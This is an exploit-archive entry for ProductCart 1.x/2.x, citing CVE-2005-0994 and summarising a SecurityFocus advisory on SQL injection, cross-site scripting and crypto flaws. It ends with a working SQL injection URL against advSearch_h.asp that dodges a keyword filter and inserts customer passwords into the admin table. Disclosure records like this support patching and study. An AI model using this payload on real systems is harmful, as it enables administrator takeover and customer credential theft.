ProductCart 1.x/2.x - 'advSearch_h.asp' Multiple SQL Injections

Author: Nick Gudov
type: webapps
platform: asp
port: 
date_added: 2004-02-16  
date_updated: 2012-12-27  
verified: 1  
codes: CVE-2005-0994;OSVDB-15263  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23703.txt  
source: https://www.securityfocus.com/bid/9669/info

EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&